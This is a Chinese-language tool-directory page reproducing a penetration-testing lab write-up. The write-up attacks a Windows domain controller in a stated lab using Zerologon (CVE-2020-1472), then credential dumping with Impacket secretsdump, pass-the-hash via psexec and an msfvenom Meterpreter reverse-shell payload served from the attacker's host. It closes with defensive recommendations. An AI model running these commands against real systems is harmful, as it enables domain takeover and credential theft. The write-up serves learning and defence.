Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — 端到端域控制器利用,使用Metasploit和Impacket:发现DC10,利用Zerologon (CVE-2020-1472),提取NTLM哈希,获得SYSTEM shell,并建立Meterpreter会话。 | Kitploit
工具/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
侦察漏洞利用框架Payload生成漏洞分析横向移动后渗透利用渗透测试学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

端到端域控制器利用,使用Metasploit和Impacket:发现DC10,利用Zerologon (CVE-2020-1472),提取NTLM哈希,获得SYSTEM shell,并建立Meterpreter会话。

查看仓库
410个月前尚未审核

使用Metasploit和Impacket进行域控制器(DC)漏洞利用

从端到端利用域控制器:发现DC10,利用Zerologon(CVE-2020-1472),提取NTLM哈希,获取SYSTEM shell,并建立Meterpreter会话。

执行摘要 本练习演示了针对一个存在CVE-2020-1472(Zerologon)漏洞的域控制器的完整、真实的攻击链。整个交互过程包括发现、服务信息收集、漏洞利用、凭据提取、横向移动和后利用验证。我成功获得了SYSTEM级别的访问权限,并通过结合Zerologon、Impacket secretsdump + 哈希传递以及msfvenom/meterpreter载荷,在DC上建立了一个持久的Meterpreter会话。在每个阶段都捕获了截图和命令产物作为证据。

实验概述: 模拟了对一个Windows域控制器的完整攻击链,使用了Metasploit和Impacket,包括发现、Zerologon、secretsdump、哈希传递以及受控的Meterpreter会话。

为什么对组织来说很重要: 因为DC控制整个域的认证、组策略和身份,一次入侵就能级联导致完全的业务中断、帐户接管、数据泄露、勒索软件部署和监管信任丧失。保护DC能够通过阻止攻击者将身份变成单点故障来保障正常运行时间、收入和声誉。

使用Metasploit + Impacket进行域控制器(DC)漏洞利用

场景

你在一个受控的实验室网络中拥有两台机器。一个系统是名为DC10的Windows域控制器,它承载核心AD服务。另一个系统是放置在同一个服务器子网中进行测试的Kali工作站。假设DC暴露了典型的域服务(例如,LDAP、Kerberos、SMB),并且可能存在已知漏洞。Kali主机预计用于侦察、漏洞利用、凭据访问、横向移动和后利用验证。任务是识别DC,确认域详细信息,使用适用的技术获得初始立足点,提取凭据材料以实现管理访问,然后通过远程shell和受管理的代理会话展示对DC的控制,同时适应任何环境限制,如已修补的服务、受限出口或端点防御。 DC: 10.1.16.1 Kali: 10.1.16.66

关键发现

  • 利用的关键漏洞:成功利用CVE-2020-1472(Zerologon)将DC机器帐户密码重置为空。
  • 凭据泄露:从DC提取了NTLM哈希(secretsdump),揭示了能够进行哈希传递的Administrator凭据。
  • 演示了完整的域控制:使用提取的哈希,在DC10上获得了SYSTEM shell(psexec),并运行了稳定的Meterpreter反向shell,确认了远程代码执行和持久性。
  • 暴露的服务:从攻击主机可以访问LDAP、Kerberos、SMB和相关RPC服务,支持发现和利用。
  • 攻击面风险:DC接受了允许机器帐户操作和远程载荷执行的远程操作。

1) 发现与范围确定

我使用了带有数据库支持的msfconsole,在MSF中运行了nmap扫描,导入了结果,并整理了主机和服务以确认DC10的暴露情况。

  • 启动带数据库支持的msfconsole,确认数据库连接。
  • 在msfconsole中对子网进行nmap扫描,并将结果导入MSF数据库。
  • 清理主机表,移除我的Kali IP。审查服务以发现可能的DC指示器。
  • 使用MSF的SYN端口扫描器,采用受限端口范围和全局线程来细化服务数据。
  • 对Windows主机进行SMB指纹识别,以丰富操作系统信息。
  • 确认10.1.16.1上的LDAP和Kerberos服务,并通过LDAP查询验证域名。
  • 决策:将10.1.16.1作为漏洞利用和凭据访问的DC重点。
Image Image Image

2) 服务信息收集与DC确认

我在MSF中进行了SYN端口扫描,对SMB进行了指纹识别,并确认了10.1.16.1上的LDAP和Kerberos。我查询了LDAP以获取域名。

Image Image Image Image Image ### SMB版本检查
  • 我在msfconsole中使用了SMB版本模块:auxiliary/scanner/smb/smb_version。
  • 使用hosts -R从主机表设置目标。
  • 获取了SMB方言和操作系统信息。
  • 结果:10.1.16.1显示了Windows Server信息,这与它作为域控制器相符。
Image Image Image Image Image

LDAP查询

  • 对于LDAP查询模块,我使用了auxiliary/gather/ldap_query。
  • 设置 rhosts 10.1.16.1 以直接访问DC10。
  • 运行它以拉取基本目录信息。
  • 结果:确认域名为“structureality”,并且DC上的LDAP正在响应。
Image Image Image Image

3) Zerologon漏洞利用(初始访问)

我针对DC10运行了auxiliary/admin/dcerpc/cve_2020_1472_zerologon,将机器帐户密码重置为空。

Image Image

4) 凭据访问(secretsdump)

使用Impacket,我从DC转储了NTLM哈希,并识别出了Administrator凭据以进行哈希传递。

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

Image Image

5) 横向移动(psexec)

我使用哈希传递和psexec在DC10上获得了SYSTEM级别的shell,并验证了主机身份。

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 如您所见,我已经位于C:\Windows\system32中。

Image Image

6) 后利用(Meterpreter)

我生成了一个reverse_tcp meterpreter载荷,通过HTTP托管它,下载到DC10,启动了一个处理程序,并执行了载荷以打开一个Meterpreter会话。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

Image Image 我启动了一个基本的web服务器,以便目标系统能够轻松访问这个meterpreter可执行文件,使用命令:

python3 -m http.server 8080

Image 在目标机器上,我执行了meterpreter可执行文件(secret.exe) Image Image Image Image Image

如您所见,我现在已经在目标DC10和Kali系统之间建立了一个反向shell连接。这是通过仅使用针对易受攻击目标的外部/远程漏洞实现的。

虽然Kali系统与DC10目标位于同一服务器子网中,但如果目标系统暴露在开放互联网上,这类攻击在互联网上也是可能的。

7) 关键成果

  • DC10被识别为structureality域的域控制器
  • Zerologon成功,实现了凭据提取
  • 使用Administrator哈希通过哈希传递获得SYSTEM shell
  • 在DC10上确认了稳定的Meterpreter会话

证据

  • MSF数据库和nmap子网扫描日志,确认主机/服务发现。
  • SMB/LDAP/Kerberos枚举输出,确认DC服务和域名structureality。
  • Zerologon模块输出,显示机器帐户密码重置为空。
  • secretsdump输出,包含提取的NTLM哈希。
  • psexec会话日志,显示C:\Windows\System32。
  • msfvenom和Meterpreter会话截图,确认远程控制。

执行的操作(总结)

  • 发现与范围确定:从msfconsole执行nmap扫描;使用MSF数据库管理主机/服务;确认DC10为目标。
  • 服务信息收集:SMB指纹识别、LDAP查询、Kerberos确认,以验证域控制器角色。
  • 初始访问:运行auxiliary/admin/dcerpc/cve_2020_1472_zerologon重置DC机器帐户密码。
  • 凭据访问:impacket-secretsdump从DC提取NTLM哈希。
  • 横向移动:impacket-psexec使用Administrator NTLM哈希 -> SYSTEM shell。
  • 后利用:构建并托管meterpreter载荷(msfvenom),在DC上下载并执行,确认持久会话。

对网络所有者的建议

  • 立即修补Netlogon漏洞,并通过扫描CVE-2020-1472的暴露情况进行验证
  • 强制启用SMB签名,并将DC的SMB和RPC暴露限制在信任的管理子网内
  • 实施分级管理,并拒绝从非管理员管理主机进行远程服务执行
  • 禁用或严格控制NTLM,优先使用Kerberos,并监控哈希传递模式
  • 出口控制:限制服务器的出站连接,仅白名单允许的目标和端口
  • 端点保护:阻止未签名的二进制文件,并对PowerShell应用AMSI集成的扫描
  • 监控:对机器帐户密码重置、异常的DRSUAPI访问以及意外的类似处理程序的监听器发出警报
  • 定期轮换特权凭据,并使用LAPS或PAM解决方案降低哈希重用风险
下载工具